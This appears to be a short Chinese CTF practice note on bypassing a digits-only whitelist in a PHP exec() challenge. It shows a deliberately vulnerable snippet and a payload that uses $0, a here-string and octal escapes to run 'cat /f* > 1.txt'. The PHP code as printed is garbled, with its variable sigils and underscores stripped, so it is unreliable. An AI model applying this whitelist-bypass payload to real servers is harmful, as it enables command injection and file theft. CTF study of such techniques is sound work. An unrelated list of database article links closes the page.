RCE联系

过滤

绕过空格

● 进制绕过

题目练习

数字rce

使用$0执行bash,<<<将后面的字符串传递给左边的命令。

例如:
<?php highlight_file(FILE); function waf(cmd) { whiteList = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '\\', '\'', '', '\<'\]; cmd_char = str_split(cmd); foreach (cmd_char as char) { if (!in_array(char, whiteList)) { die("hacker"); } } return cmd; } cmd = _GET['cmd']; exec(waf(cmd)); cmd=0<<<'\\143\\141\\164\\040\\57\\146\\52\\040\\76\\040\\61\\56\\164\\170\\164' 0代表当前脚本名称,如何在bash里运行代表/bin/bash <<<是bash中的Here String重定向符,会将后面的字符串作为标准输入传递给左边的命令 后面那段是八进制绕过,相当于$'cat /f* > 1.txt'

相关推荐
A-刘晨阳25 分钟前
从MongoDB到金仓:一次电子证照系统的平滑国产化升级实践
数据库·mongodb
瓜瓜怪兽亚32 分钟前
前端基础知识---10 Node.js(三)
数据结构·数据库·node.js
掘根2 小时前
【Qt】常用控件3——显示类控件
开发语言·数据库·qt
码码哈哈爱分享2 小时前
MariaDB 与 MySQL 区别
数据库·mysql·mariadb
爱敲代码的TOM3 小时前
深入MySQL底层1-存储引擎与索引
数据库·mysql
GUIQU.3 小时前
【QT】嵌入式开发:从零开始,让硬件“活”起来的魔法之旅
java·数据库·c++·qt
自信的小螺丝钉5 小时前
Leetcode 146. LRU 缓存 哈希表 + 双向链表
leetcode·缓存·散列表
牛奶咖啡136 小时前
关系数据库MySQL的常用基础命令详解实战
数据库·mysql·本地远程连接到mysql·创建mysql用户和密码·修改mysql用户的密码·设置mysql密码的使用期限·设置和移除mysql用户的权限
ANYOLY7 小时前
Redis 面试宝典
数据库·redis·面试
鲲志说7 小时前
数据洪流时代,如何挑选一款面向未来的时序数据库?IoTDB 的答案
大数据·数据库·apache·时序数据库·iotdb